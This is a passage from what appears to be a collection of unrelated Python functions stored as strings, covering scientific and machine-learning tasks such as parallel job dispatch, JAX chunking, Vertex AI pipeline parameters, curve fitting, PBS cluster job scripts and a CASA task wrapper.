num_processes = kwargs.get('num_processes', mp.cpu_count())\r\n if num_processes > 1:\r\n output = mp.Queue()\r\n\r\n def fun(seed, output):\r\n output.put(\r\n serial_fun(\r\n burned_in_config,\r\n urng=np.random.RandomState(seed).random, **kwargs\r\n )\r\n )\r\n\r\n processes = [\r\n mp.Process(target=fun, args=(seed, output))\r\n for seed in np.random.randint(88, size=num_processes)\r\n ]\r\n for p in processes:\r\n p.start()\r\n for p in processes:\r\n p.join()\r\n process_results = [output.get() for p in processes]\r\n return np.mean(process_results)\r\n return serial_fun(burned_in_config, **kwargs)", "def _chunk_vmapped_function(vmapped_fun, chunk_size, argnums=0):\n\n if chunk_size is None:\n return vmapped_fun\n\n if isinstance(argnums, int):\n argnums = (argnums,)\n\n def _fun(*args):\n\n n_elements = jax.tree_leaves(args[argnums[0]])[0].shape[0]\n n_chunks, n_rest = divmod(n_elements, chunk_size)\n\n if n_chunks == 0 or chunk_size >= n_elements:\n y = vmapped_fun(*args)\n else:\n # split inputs\n def _get_chunks(x):\n x_chunks = jax.tree_map(lambda x_: x_[: n_elements - n_rest, ...], x)\n x_chunks = 
_chunk(x_chunks, chunk_size)\n return x_chunks\n\n def _get_rest(x):\n x_rest = jax.tree_map(lambda x_: x_[n_elements - n_rest :, ...], x)\n return x_rest\n\n args_chunks = [\n _get_chunks(a) if i in argnums else a for i, a in enumerate(args)\n ]\n args_rest = [\n _get_rest(a) if i in argnums else a for i, a in enumerate(args)\n ]\n\n y_chunks = _unchunk(\n scanmap(vmapped_fun, scan_append, argnums)(*args_chunks)\n )\n\n if n_rest == 0:\n y = y_chunks\n else:\n y_rest = vmapped_fun(*args_rest)\n y = jax.tree_map(\n lambda y1, y2: jnp.concatenate((y1, y2)), y_chunks, y_rest\n )\n return y\n\n return _fun", "def fun_par_dict(fun: Callable, *args):\n if len(args) > 0:\n return fun(*args[:-1], **args[-1])\n else:\n return fun()", "def _get_default_pipeline_params(\n project: str,\n location: str,\n root_dir: str,\n target_column: str,\n prediction_type: str,\n optimization_objective: str,\n transformations: str,\n train_budget_milli_node_hours: float,\n stage_1_num_parallel_trials: Optional[int] = None,\n stage_2_num_parallel_trials: Optional[int] = None,\n stage_2_num_selected_trials: Optional[int] = None,\n data_source_csv_filenames: Optional[str] = None,\n data_source_bigquery_table_path: Optional[str] = None,\n predefined_split_key: Optional[str] = None,\n timestamp_split_key: Optional[str] = None,\n stratified_split_key: Optional[str] = None,\n training_fraction: Optional[float] = None,\n validation_fraction: Optional[float] = None,\n test_fraction: Optional[float] = None,\n weight_column: Optional[float] = None,\n study_spec_parameters_override: Optional[List[Dict[str, Any]]] = None,\n optimization_objective_recall_value: Optional[float] = None,\n optimization_objective_precision_value: Optional[float] = None,\n stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n export_additional_model_without_custom_ops: bool = False,\n stats_and_example_gen_dataflow_machine_type: Optional[str] = None,\n stats_and_example_gen_dataflow_max_num_workers: Optional[int] = None,\n stats_and_example_gen_dataflow_disk_size_gb: Optional[int] = None,\n transform_dataflow_machine_type: Optional[str] = None,\n transform_dataflow_max_num_workers: Optional[int] = None,\n transform_dataflow_disk_size_gb: Optional[int] = None,\n dataflow_subnetwork: Optional[str] = None,\n dataflow_use_public_ips: bool = True,\n encryption_spec_key_name: Optional[str] = None,\n additional_experiments: Optional[Dict[str, Any]] = None,\n dataflow_service_account: Optional[str] = None,\n max_selected_features: Optional[int] = None,\n apply_feature_selection_tuning: bool = False,\n run_evaluation: bool = True,\n evaluation_batch_predict_machine_type: Optional[str] = None,\n evaluation_batch_predict_starting_replica_count: Optional[int] = None,\n evaluation_batch_predict_max_replica_count: Optional[int] = None,\n evaluation_batch_explain_machine_type: Optional[str] = None,\n evaluation_batch_explain_starting_replica_count: Optional[int] = None,\n evaluation_batch_explain_max_replica_count: Optional[int] = None,\n evaluation_dataflow_machine_type: Optional[str] = None,\n evaluation_dataflow_starting_num_workers: Optional[int] = None,\n evaluation_dataflow_max_num_workers: Optional[int] = None,\n evaluation_dataflow_disk_size_gb: Optional[int] = None,\n run_distillation: bool = False,\n distill_batch_predict_machine_type: Optional[str] = None,\n distill_batch_predict_starting_replica_count: Optional[int] = None,\n 
distill_batch_predict_max_replica_count: Optional[int] = None,\n stage_1_tuning_result_artifact_uri: Optional[str] = None,\n quantiles: Optional[List[float]] = None,\n enable_probabilistic_inference: bool = False,\n num_selected_features: Optional[int] = None,\n model_display_name: str = '',\n model_description: str = '',\n) -> Dict[str, Any]:\n if not study_spec_parameters_override:\n study_spec_parameters_override = []\n if not stage_1_tuner_worker_pool_specs_override:\n stage_1_tuner_worker_pool_specs_override = []\n if not cv_trainer_worker_pool_specs_override:\n cv_trainer_worker_pool_specs_override = []\n if not quantiles:\n quantiles = []\n\n parameter_values = {}\n parameters = {\n 'project': project,\n 'location': location,\n 'root_dir': root_dir,\n 'target_column': target_column,\n 'prediction_type': prediction_type,\n 'data_source_csv_filenames': data_source_csv_filenames,\n 'data_source_bigquery_table_path': data_source_bigquery_table_path,\n 'predefined_split_key': predefined_split_key,\n 'timestamp_split_key': timestamp_split_key,\n 'stratified_split_key': stratified_split_key,\n 'training_fraction': training_fraction,\n 'validation_fraction': validation_fraction,\n 'test_fraction': test_fraction,\n 'optimization_objective': optimization_objective,\n 'train_budget_milli_node_hours': train_budget_milli_node_hours,\n 'stage_1_num_parallel_trials': stage_1_num_parallel_trials,\n 'stage_2_num_parallel_trials': stage_2_num_parallel_trials,\n 'stage_2_num_selected_trials': stage_2_num_selected_trials,\n 'weight_column': weight_column,\n 'optimization_objective_recall_value': (\n optimization_objective_recall_value\n ),\n 'optimization_objective_precision_value': (\n optimization_objective_precision_value\n ),\n 'study_spec_parameters_override': study_spec_parameters_override,\n 'stage_1_tuner_worker_pool_specs_override': (\n stage_1_tuner_worker_pool_specs_override\n ),\n 'cv_trainer_worker_pool_specs_override': (\n cv_trainer_worker_pool_specs_override\n ),\n 'export_additional_model_without_custom_ops': (\n export_additional_model_without_custom_ops\n ),\n 'dataflow_subnetwork': dataflow_subnetwork,\n 'dataflow_use_public_ips': dataflow_use_public_ips,\n 'dataflow_service_account': dataflow_service_account,\n 'encryption_spec_key_name': encryption_spec_key_name,\n 'max_selected_features': max_selected_features,\n 'stage_1_tuning_result_artifact_uri': stage_1_tuning_result_artifact_uri,\n 'quantiles': quantiles,\n 'enable_probabilistic_inference': enable_probabilistic_inference,\n 'model_display_name': model_display_name,\n 'model_description': model_description,\n }\n parameter_values.update(\n {param: value for param, value in parameters.items() if value is not None}\n )\n\n if run_evaluation:\n eval_parameters = {\n 'evaluation_batch_predict_machine_type': (\n evaluation_batch_predict_machine_type\n ),\n 'evaluation_batch_predict_starting_replica_count': (\n evaluation_batch_predict_starting_replica_count\n ),\n 'evaluation_batch_predict_max_replica_count': (\n evaluation_batch_predict_max_replica_count\n ),\n 'evaluation_batch_explain_machine_type': (\n evaluation_batch_explain_machine_type\n ),\n 'evaluation_batch_explain_starting_replica_count': (\n evaluation_batch_explain_starting_replica_count\n ),\n 'evaluation_batch_explain_max_replica_count': (\n evaluation_batch_explain_max_replica_count\n ),\n 'evaluation_dataflow_machine_type': evaluation_dataflow_machine_type,\n 'evaluation_dataflow_starting_num_workers': (\n evaluation_dataflow_starting_num_workers\n ),\n 
'evaluation_dataflow_max_num_workers': (\n evaluation_dataflow_max_num_workers\n ),\n 'evaluation_dataflow_disk_size_gb': evaluation_dataflow_disk_size_gb,\n 'run_evaluation': run_evaluation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in eval_parameters.items()\n if value is not None\n }\n )\n\n # V1 pipeline without FTE\n if num_selected_features is None:\n if not additional_experiments:\n additional_experiments = {}\n\n parameters = {\n 'transformations': transformations,\n 'stats_and_example_gen_dataflow_machine_type': (\n stats_and_example_gen_dataflow_machine_type\n ),\n 'stats_and_example_gen_dataflow_max_num_workers': (\n stats_and_example_gen_dataflow_max_num_workers\n ),\n 'stats_and_example_gen_dataflow_disk_size_gb': (\n stats_and_example_gen_dataflow_disk_size_gb\n ),\n 'transform_dataflow_machine_type': transform_dataflow_machine_type,\n 'transform_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'transform_dataflow_disk_size_gb': transform_dataflow_disk_size_gb,\n 'additional_experiments': additional_experiments,\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n if apply_feature_selection_tuning:\n parameter_values.update({\n 'apply_feature_selection_tuning': apply_feature_selection_tuning,\n })\n\n if run_distillation:\n distillation_parameters = {\n 'distill_batch_predict_machine_type': (\n distill_batch_predict_machine_type\n ),\n 'distill_batch_predict_starting_replica_count': (\n distill_batch_predict_starting_replica_count\n ),\n 'distill_batch_predict_max_replica_count': (\n distill_batch_predict_max_replica_count\n ),\n 'run_distillation': run_distillation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in distillation_parameters.items()\n if value is not None\n }\n )\n\n # V2 pipeline (with FTE)\n else:\n if run_distillation:\n raise ValueError(\n 'Distillation is currently not supported'\n ' when num_selected_features is specified.'\n )\n\n parameters = {\n 'num_selected_features': num_selected_features,\n 'dataset_level_custom_transformation_definitions': [],\n 'dataset_level_transformations': [],\n 'tf_auto_transform_features': {},\n 'tf_custom_transformation_definitions': [],\n 'legacy_transformations_path': transformations,\n 'feature_transform_engine_dataflow_machine_type': (\n transform_dataflow_machine_type\n ),\n 'feature_transform_engine_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'feature_transform_engine_dataflow_disk_size_gb': (\n transform_dataflow_disk_size_gb\n ),\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n return parameter_values", "def grid_search(func, param_grid, wrapper=None, n_jobs=1, verbose=0):\n if wrapper is None:\n wrapper = _default_wrapper\n # check if enough memory\n size_ = _get_final_size(param_grid)\n if size_ > 0.9 * psutil.virtual_memory().available:\n raise MemoryError(\"not enough memory 'param_grid'\"\n \" weigh {0} ..\".format(humanize.naturalsize(size_)))\n # sanitize value to list type\n for key, value in param_grid.iteritems():\n if not isinstance(value, list):\n param_grid[key] = [value]\n list_kwargs = [dict(zip(param_grid, x))\n for x in itertools.product(*param_grid.values())]\n # Run the reconstruction\n if verbose > 0:\n if n_jobs == -1:\n n_jobs_used = psutil.cpu_count()\n elif n_jobs == -2:\n n_jobs_used = psutil.cpu_count() - 1\n else:\n n_jobs_used = n_jobs\n 
print((\"Running grid_search for {0} candidates\"\n \" on {1} jobs\").format(len(list_kwargs), n_jobs_used))\n res = Parallel(n_jobs=n_jobs, verbose=verbose)(\n delayed(wrapper)(func, **kwargs)\n for kwargs in list_kwargs)\n return list_kwargs, res", "def c_torch_score_mp(ve, xs, y, func_index, n_jobs=1, return_numpy=False, clf=False, single_start=6):\n if isinstance(ve, np.ndarray):\n ve = ve.tolist()\n if n_jobs == 1:\n return c_torch_score(ve, xs, y, func_index, return_numpy, clf, single_start=single_start)\n else:\n for i in range(3):\n print(\"For torch with c++ (c_torch), with n_jobs>1, this function is very slow!\")\n\n pool = Pool(n_jobs)\n\n left = int(len(ve) % n_jobs)\n\n if left > 0:\n bs = int(len(ve) // n_jobs)\n nve = [ve[bs * (i - 1):i * bs] for i in range(1, n_jobs + 1)]\n nve.append(ve[-left:])\n else:\n bs = int(len(ve) // n_jobs)\n nve = [ve[bs * (i - 1):i * bs] for i in range(1, n_jobs + 1)]\n\n res = []\n for nvei in nve:\n ret = pool.apply(c_torch_score_temp, (nvei, xs, y, func_index, clf, single_start))\n res.append(ret)\n pool.close()\n pool.join()\n\n if not return_numpy:\n res = torch.cat(res)\n else:\n res = np.concatenate(res)\n return res", "def jac_pnp(beta, **kw):\n temp = kw.get('temp', 85)\n rate_source_ = kw.get('rate_source', 1E-4)\n DSIN_ = kw.get('DSIN', 3.92E-16)\n stress_voltage = kw.get('stress_voltage', 3.75)\n L1_ = kw.get('L1', 0.075)\n N1_ = int(kw.get('N1', 100))\n tsteps_ = int(kw.get('tsteps', 720))\n time_s = kw.get('time_s', np.array([0]))\n rsh_norm_ = kw.get('rsh_norm', np.array([0]))\n print('Called jac_pnp')\n\n S0_ = 10 ** beta[0]\n h_ = 10 ** beta[1]\n DSF_ = 10 ** beta[2]\n # y0 = ml_pid.simulate_rsh(\n # S0=S0_, h=h_, DSF=DSF_, simulation_time=np.amax(time_s) * 1.1,\n # temperature=temp, rate_source=rate_source_, DSIN=DSIN_,\n # stress_voltage=stress_voltage, L1=L1_, m=1, time_steps=tsteps_,\n # N1=N1_\n # )\n\n EPS_ = np.finfo(np.float).eps\n delta = EPS_ ** (1 / 3)\n delta = 1E-1\n\n # forward\n # derivparams_forward = []\n derivparams = []\n for i in range(len(beta)):\n copy = np.array(beta)\n copy[i] += delta\n derivparams.append(copy)\n # backward\n # derivparams_backward = []\n for i in range(len(beta)):\n copy = np.array(beta)\n copy[i] -= delta\n derivparams.append(copy)\n\n # results_forward = pool.map(partial(func, **kw), derivparams_forward)\n # results_backward = pool.map(partial(func, **kw), derivparams_backward)\n results = np.array(pool.map(partial(func, **kw), derivparams))\n [m, n] = results.shape\n idx = int(m / 2)\n results_forward = results[0:idx, :]\n results_backward = results[idx::,:]\n derivs = [(rf - rb) / (2.0 * delta) for rf, rb in zip(results_forward, results_backward)]\n return np.array(derivs).T", "def run_migrad(self, fitarg, **kwargs):\n self.fitarg = fitarg\n kwargs['up'] = 1.\n\n\n logging.debug(self._par_names)\n logging.debug(self.__wrap_likelihood(list(fitarg['pinit'].values())))\n\n if kwargs['scipy']:\n self._res = op.minimize(self.__wrap_likelihood,\n list(fitarg['pinit'].values()),\n bounds=list(fitarg['limits'].values()),\n method='TNC',\n #method='Powell',\n options={'maxiter': kwargs['ncall']} #'xtol': 1e-20, 'eps' : 1e-20, 'disp': True}\n #tol=None, callback=None,\n #options={'disp': False, 'minfev': 0, 'scale': None,\n #'rescale': -1, 'offset': None, 'gtol': -1,\n #'eps': 1e-08, 'eta': -1, 'maxiter': kwargs['ncall'],\n #'maxCGit': -1, 'mesg_num': None, 'ftol': -1, 'xtol': -1, 'stepmx': 0,\n #'accuracy': 0}\n )\n logging.info(self._res)\n for i, k in enumerate(self._par_names):\n 
fitarg[k] = self._res.x[i]\n\n logging.debug(fitarg)\n\n cmd_string = \"lambda {0}: self.__calcLikelihood({0})\".format(\n (\", \".join(self._par_names), \", \".join(self._par_names)))\n\n string_args = \", \".join(self._par_names)\n global f # needs to be global for eval to find it\n f = lambda *args: self.__calc_likelihood(*args)\n\n cmd_string = \"lambda %s: f(%s)\" % (string_args, string_args)\n logging.debug(cmd_string)\n\n # work around so that the parameters get names for minuit\n self._minimize_f = eval(cmd_string, globals(), locals())\n self._minimize_f.errordef = minuit.Minuit.LEAST_SQUARES\n\n self._m = minuit.Minuit(self._minimize_f,\n #list(fitarg['pinit'].values()),\n **fitarg['pinit'],\n #names=self._par_names\n )\n# print_level=kwargs['verbosity'],\n# errordef=kwargs['up'],\n# pedantic=kwargs['pedantic'],\n #**fitarg)\n\n for p in self._par_names:\n self._m.fixed[p] = fitarg['fix'][p]\n self._m.limits[p] = fitarg['limits'][p]\n self._m.errors[p] = fitarg['error'][p]\n\n self._m.tol = kwargs['tol']\n self._m.strategy = kwargs['strategy']\n\n logging.debug(\"tol {0:.2e}, strategy: {1:n}\".format(\n self._m.tol, self._m.strategy.strategy))\n\n self._m.migrad(ncall=kwargs['ncall']) #, precision = kwargs['precision'])", "def effective_n_jobs(n_jobs=-1):\n if n_jobs == 1:\n return 1\n\n backend, backend_n_jobs = get_active_backend()\n if n_jobs is None:\n n_jobs = backend_n_jobs\n return backend.effective_n_jobs(n_jobs=n_jobs)", "def run_on_server(func_master, *args, **kwargs):\n\n from gausspy.gaussian_job_manager import Job\n #we can pass in job_obj details with the function/class if we wish\n try:\n func_obj, job_obj = func_master\n except TypeError:\n func_obj = func_master\n job_obj = None\n\n try:\n name = func_obj.calc.label\n except AttributeError:\n try:\n name = func_obj.func_name\n except AttributeError:\n name = 'unknown'\n\n name += '_' + str(uuid.uuid1())\n\n \n #this means functions that actually have an inc_session keyword argument\n #will have the value stripped out (I'm hoping we don't come across any)\n try:\n inc_session = kwargs.pop('inc_session')\n except KeyError:\n inc_session=False\n\n try:\n savefiles = kwargs.pop('savefiles')\n except KeyError:\n savefiles = ''\n\n try: \n namefile_f = kwargs.pop('namefile_f')\n except KeyError:\n namefile_f = lambda e: name\n try:\n compress = kwargs.pop('compress')\n except KeyError:\n compress = False\n \n if inc_session:\n dill.dump_session(name + '_session.pkl')\n\n with open(name + '.pkl', 'w') as f:\n dill.dump([func_obj, args, kwargs], f)\n\n serv_home = config.get('gaussian', 'gauss_home')\n path = os.path.join(serv_home + get_active_path(), '')\n serv_work = config.get('gaussian', 'gauss_scratch')\n scratch_path = os.path.join(serv_work + get_active_path(), '')\n #if we have set the ASE and Gaussian home/work directories to nothing. I.e. 
we are running on the node\n #then the only way of recovering the original directories is to use the PBS shell variables that contain the directory\n #that the job was submitted from (which is the correct home directory).\n\n #scratch_path = os.environ['PBS_O_WORKDIR '].replace('/home','/work')\n\n exec_command = 'execute_calc {f_pckl};'.format(\n pth=path,\n f_pckl=path + name + '.pkl')\n\n if compress and savefiles:\n exec_command += 'mkdir -p {scratch};'.format(scratch=scratch_path)\n exec_command += 'tar -cvjf {n}.tar.bz2 {f};'.format(n=name, f=savefiles)\n exec_command += 'cp {n}.tar.bz2 {scratch};'.format(n=name, scratch=scratch_path)\n elif savefiles:\n exec_command += 'mkdir -p {scratch};'.format(scratch=scratch_path)\n #exec_command += 'find . -maxdepth 1 ! -iregex \"{r}\" -exec cp -r {} {scratch} \\;'.format(r=savefiles, scratch=scratch_path)\n exec_command += 'cp {f} {scratch};'.format(f=savefiles, scratch=scratch_path)\n\n if not job_obj:\n try:\n nodes = func_obj.calc.job_params['nodes']\n mem = func_obj.calc.job_params['memory'] + nodes * 150\n time = func_obj.calc.job_params['time']\n queue = func_obj.calc.job_params['queue']\n\n job_obj = Job(procs=nodes, memory=mem, walltime=time, queue=queue)\n except AttributeError:\n job_obj = Job()\n\n script = job_obj.gen_header() + exec_command\n\n with open(name + '_job_script.sh', 'w') as f:\n f.write(script)\n\n if inc_session:\n extra_files = [name + '.pkl', name + '_session.pkl']\n else:\n extra_files = [name + '.pkl']\n\n submission = remote.qsub(os.getcwd() + '/' + name + '_job_script.sh', extra_files=extra_files)\n\n os.remove(name + '.pkl')\n\n try:\n os.remove(name + '_session.pkl')\n except OSError:\n pass\n\n return submission", "def test_generic(args):\n (tol,cons,sol,test_func,low,high,shape) = args\n #if shape == 0:\n #x0 = np.random.uniform(0, 2, (1000, 5))\n #print('here')\n x0 = init_feasible(cons, low=low, high=high, shape=shape)\n t0 = time.time()\n res = minimize_qpso(test_func, x0, tol=tol)\n t1= time.time()\n converged = res.success\n qpso_converged = 0\n qpso_nit = res.nit\n try:\n np.testing.assert_array_almost_equal(sol, res.x, 3)\n except:\n qpso_converged = 1\n # if high is None:\n #x0 = np.random.uniform(0, 2, (1000, 5))\n # else:\n x0 = init_feasible(cons, low=low, high=high, shape=shape)\n t2= time.time()\n res = minimize(test_func,x0, tol=tol)\n t3 = time.time()\n converged = res.success\n pso_converged = 0\n pso_nit = res.nit\n assert converged, res.message\n try:\n np.testing.assert_array_almost_equal(sol, res.x, 3)\n except:\n pso_converged = 1\n \n return qpso_converged, qpso_nit ,t1-t0, pso_converged , pso_nit , t3-t2", "def jacobian_numba(coordinates, points, jac, greens_function):\n east, north, upward = coordinates[:]\n point_east, point_north, point_upward = points[:]\n for i in prange(east.size):\n for j in range(point_east.size):\n jac[i, j] = greens_function(\n east[i],\n north[i],\n upward[i],\n point_east[j],\n point_north[j],\n point_upward[j],\n )", "def backsubstitution_numba(b, dofmap, num_dofs_per_element, mpc,\n global_indices):\n (slaves, slave_cells, cell_to_slave, cell_to_slave_offset,\n masters_local, coefficients, offsets) = mpc\n slaves_visited = numpy.empty(0, dtype=numpy.float64)\n\n # Loop through slave cells\n for (index, cell_index) in enumerate(slave_cells):\n cell_slaves = cell_to_slave[cell_to_slave_offset[index]:\n cell_to_slave_offset[index+1]]\n local_dofs = dofmap[num_dofs_per_element * cell_index:\n num_dofs_per_element * cell_index\n + num_dofs_per_element]\n\n # 
Find the global index of the slaves on the cell in the slaves-array\n global_slaves_index = []\n for gi in range(len(slaves)):\n if in_numpy_array(cell_slaves, slaves[gi]):\n global_slaves_index.append(gi)\n\n for slave_index in global_slaves_index:\n slave = slaves[slave_index]\n k = -1\n # Find local position of slave dof\n for local_dof in local_dofs:\n if global_indices[local_dof] == slave:\n k = local_dof\n assert k != -1\n # Check if we have already inserted for this slave\n if not in_numpy_array(slaves_visited, slave):\n slaves_visited = numpy.append(slaves_visited, slave)\n slaves_masters = masters_local[offsets[slave_index]:\n offsets[slave_index+1]]\n slaves_coeffs = coefficients[offsets[slave_index]:\n offsets[slave_index+1]]\n for (master, coeff) in zip(slaves_masters, slaves_coeffs):\n b[k] += coeff*b[master]", "def create_job(jobrun, vcf_filenames):\n if jobrun == \"cluster\":\n \"\"\"\n Supports only PBS clusters for now.\n \"\"\"\n for i in vcf_filenames:\n job_name = os.path.basename(i)\n job_print_string = \"#PBS -N %s\\n#PBS -M apirani@med.umich.edu\\n#PBS -m abe\\n#PBS -V\\n#PBS -l nodes=1:ppn=4,pmem=4000mb,walltime=72:00:00\\n#PBS -q fluxod\\n#PBS -A esnitkin_fluxod\\n#PBS -l qos=flux\\n\\n/home/apirani/anaconda/bin/python /nfs/esnitkin/bin_group/scripts/Scripts_v2.0/variants_position_analysis/reason_job.py -filter2_only_snp_vcf_dir %s -filter2_only_snp_vcf_file %s\\n\" % (job_name, args.filter2_only_snp_vcf_dir, i)\n job_file_name = \"%s.pbs\" % (i)\n f1=open(job_file_name, 'w+')\n f1.write(job_print_string)\n f1.close()\n #os.system(\"mv %s/*.pbs %s/temp\" % (args.filter2_only_snp_vcf_dir, args.filter2_only_snp_vcf_dir))\n pbs_dir = args.filter2_only_snp_vcf_dir + \"/*.pbs\"\n pbs_scripts = glob.glob(pbs_dir)\n for i in pbs_scripts:\n print \"Running: qsub %s\" % i\n #os.system(\"qsub %s\" % i)\n\n elif jobrun == \"parallel-local\":\n \"\"\"\n Generate a Command list of each job and run it in parallel on different cores available on local system\n \"\"\"\n command_array = []\n command_file = \"%s/commands_list.sh\" % args.filter2_only_snp_vcf_dir\n f3 = open(command_file, 'w+')\n\n\n for i in vcf_filenames:\n job_name = os.path.basename(i)\n job_print_string = \"#PBS -N %s\\n#PBS -M apirani@med.umich.edu\\n#PBS -m abe\\n#PBS -V\\n#PBS -l nodes=1:ppn=4,pmem=4000mb,walltime=72:00:00\\n#PBS -q fluxod\\n#PBS -A esnitkin_fluxod\\n#PBS -l qos=flux\\n\\n/home/apirani/anaconda/bin/python /nfs/esnitkin/bin_group/scripts/Scripts_v2.0/variants_position_analysis/reason_job.py -filter2_only_snp_vcf_dir %s -filter2_only_snp_vcf_file %s\\n\" % (job_name, args.filter2_only_snp_vcf_dir, i)\n job_file_name = \"%s.pbs\" % (i)\n f1=open(job_file_name, 'w+')\n f1.write(job_print_string)\n f1.close()\n #os.system(\"mv %s/*.pbs %s/temp\" % (args.filter2_only_snp_vcf_dir, args.filter2_only_snp_vcf_dir))\n pbs_dir = args.filter2_only_snp_vcf_dir + \"/*.pbs\"\n pbs_scripts = glob.glob(pbs_dir)\n\n\n for i in pbs_scripts:\n f3.write(\"bash %s\\n\" % i)\n f3.close()\n with open(command_file, 'r') as fpp:\n for lines in fpp:\n lines = lines.strip()\n command_array.append(lines)\n fpp.close()\n print len(command_array)\n if args.numcores:\n num_cores = int(num_cores)\n else:\n num_cores = multiprocessing.cpu_count()\n results = Parallel(n_jobs=num_cores)(delayed(run_command)(command) for command in command_array)\n\n elif jobrun == \"parallel-single-cluster\":\n print \" \"\n else:\n \"\"\"\n Generate a Command list of each job and run it on local system one at a time\n \"\"\"\n command_array = 
[]\n command_file = \"%s/commands_list.sh\" % args.filter2_only_snp_vcf_dir\n os.system(\"bash %s\" % command_file)", "def default_params(defaults):\n def wrap(function):\n def withargs(*args, **kwargs):\n merged = {}\n merged.update(defaults)\n merged.update(kwargs)\n return function(*args, **merged)\n return withargs\n return wrap", "def __call__(self, imagename=None, box=None, region=None, chans=None, stokes=None, axis=None, mask=None, minpts=None, multifit=None, spxtype=None, spxest=None, spxfix=None, div=None, spxsol=None, spxerr=None, model=None, residual=None, wantreturn=None, stretch=None, logresults=None, logfile=None, append=None, sigma=None, outsigma=None, ):\n if not hasattr(self, \"__globals__\") or self.__globals__ == None :\n self.__globals__=stack_frame_find( )\n #casac = self.__globals__['casac']\n casalog = self.__globals__['casalog']\n casa = self.__globals__['casa']\n #casalog = casac.casac.logsink()\n self.__globals__['__last_task'] = 'spxfit'\n self.__globals__['taskname'] = 'spxfit'\n ###\n self.__globals__['update_params'](func=self.__globals__['taskname'],printtext=False,ipython_globals=self.__globals__)\n ###\n ###\n #Handle globals or user over-ride of arguments\n #\n if type(self.__call__.func_defaults) is NoneType:\n function_signature_defaults={}\n else:\n function_signature_defaults=dict(zip(self.__call__.func_code.co_varnames[1:],self.__call__.func_defaults))\n useLocalDefaults = False\n\n for item in function_signature_defaults.iteritems():\n key,val = item\n keyVal = eval(key)\n if (keyVal == None):\n #user hasn't set it - use global/default\n pass\n else:\n #user has set it - use over-ride\n if (key != 'self') :\n useLocalDefaults = True\n\n myparams = {}\n if useLocalDefaults :\n for item in function_signature_defaults.iteritems():\n key,val = item\n keyVal = eval(key)\n exec('myparams[key] = keyVal')\n self.parameters[key] = keyVal\n if (keyVal == None):\n exec('myparams[key] = '+ key + ' = self.itsdefault(key)')\n keyVal = eval(key)\n if(type(keyVal) == dict) :\n if len(keyVal) > 0 :\n exec('myparams[key] = ' + key + ' = keyVal[len(keyVal)-1][\\'value\\']')\n else :\n exec('myparams[key] = ' + key + ' = {}')\n\n else :\n print ''\n\n myparams['imagename'] = imagename = self.parameters['imagename']\n myparams['box'] = box = self.parameters['box']\n myparams['region'] = region = self.parameters['region']\n myparams['chans'] = chans = self.parameters['chans']\n myparams['stokes'] = stokes = self.parameters['stokes']\n myparams['axis'] = axis = self.parameters['axis']\n myparams['mask'] = mask = self.parameters['mask']\n myparams['minpts'] = minpts = self.parameters['minpts']\n myparams['multifit'] = multifit = self.parameters['multifit']\n myparams['spxtype'] = spxtype = self.parameters['spxtype']\n myparams['spxest'] = spxest = self.parameters['spxest']\n myparams['spxfix'] = spxfix = self.parameters['spxfix']\n myparams['div'] = div = self.parameters['div']\n myparams['spxsol'] = spxsol = self.parameters['spxsol']\n myparams['spxerr'] = spxerr = self.parameters['spxerr']\n myparams['model'] = model = self.parameters['model']\n myparams['residual'] = residual = self.parameters['residual']\n myparams['wantreturn'] = wantreturn = self.parameters['wantreturn']\n myparams['stretch'] = stretch = self.parameters['stretch']\n myparams['logresults'] = logresults = self.parameters['logresults']\n myparams['logfile'] = logfile = self.parameters['logfile']\n myparams['append'] = append = self.parameters['append']\n myparams['sigma'] = sigma = 
self.parameters['sigma']\n myparams['outsigma'] = outsigma = self.parameters['outsigma']\n\n if type(spxest)==float: spxest=[spxest]\n if type(spxfix)==bool: spxfix=[spxfix]\n\n result = None\n\n#\n# The following is work around to avoid a bug with current python translation\n#\n mytmp = {}\n\n mytmp['imagename'] = imagename\n mytmp['box'] = box\n mytmp['region'] = region\n mytmp['chans'] = chans\n mytmp['stokes'] = stokes\n mytmp['axis'] = axis\n mytmp['mask'] = mask\n mytmp['minpts'] = minpts\n mytmp['multifit'] = multifit\n mytmp['spxtype'] = spxtype\n mytmp['spxest'] = spxest\n mytmp['spxfix'] = spxfix\n mytmp['div'] = div\n mytmp['spxsol'] = spxsol\n mytmp['spxerr'] = spxerr\n mytmp['model'] = model\n mytmp['residual'] = residual\n mytmp['wantreturn'] = wantreturn\n mytmp['stretch'] = stretch\n mytmp['logresults'] = logresults\n mytmp['logfile'] = logfile\n mytmp['append'] = append\n mytmp['sigma'] = sigma\n mytmp['outsigma'] = outsigma\n pathname='file://' + casa['dirs']['xml'] + '/'\n trec = casac.casac.utils().torecord(pathname+'spxfit.xml')\n\n casalog.origin('spxfit')\n try :\n #if not trec.has_key('spxfit') or not casac.casac.utils().verify(mytmp, trec['spxfit']) :\n #return False\n\n casac.casac.utils().verify(mytmp, trec['spxfit'], True)\n scriptstr=['']\n saveinputs = self.__globals__['saveinputs']\n\n # Save .last file for this task execution. MPI servers don't write it (CASR-329).\n from mpi4casa.MPIEnvironment import MPIEnvironment\n do_full_logging = MPIEnvironment.is_mpi_disabled_or_client()\n if type(self.__call__.func_defaults) is NoneType:\n saveinputs=''\n else:\n saveinputs('spxfit', 'spxfit.last', myparams, self.__globals__,scriptstr=scriptstr, do_save_inputs=do_full_logging)\n\n tname = 'spxfit'\n spaces = ' '*(18-len(tname))\n casalog.post('\\n##########################################'+\n '\\n##### Begin Task: ' + tname + spaces + ' #####')\n # Don't do telemetry from MPI servers (CASR-329)\n if do_full_logging and casa['state']['telemetry-enabled']:\n #casalog.poststat('Begin Task: ' + tname)\n task_starttime = str(datetime.datetime.now())\n if type(self.__call__.func_defaults) is NoneType:\n casalog.post(scriptstr[0]+'\\n', 'INFO')\n else:\n casalog.post(scriptstr[1][1:]+'\\n', 'INFO')\n\n # Effective call to the task as defined in gcwrap/python/scripts/task_*\n result = spxfit(imagename, box, region, chans, stokes, axis, mask, minpts, multifit, spxtype, spxest, spxfix, div, spxsol, spxerr, model, residual, wantreturn, stretch, logresults, logfile, append, sigma, 